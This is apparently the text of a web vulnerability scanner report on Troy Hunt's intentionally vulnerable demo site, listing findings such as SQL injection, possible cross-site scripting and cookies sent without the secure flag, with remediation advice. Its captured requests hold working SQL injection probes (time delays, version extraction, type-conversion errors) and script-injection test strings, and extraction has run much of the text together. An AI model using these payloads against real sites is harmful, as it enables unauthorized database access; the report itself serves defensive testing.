Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230647 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtPaganis - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
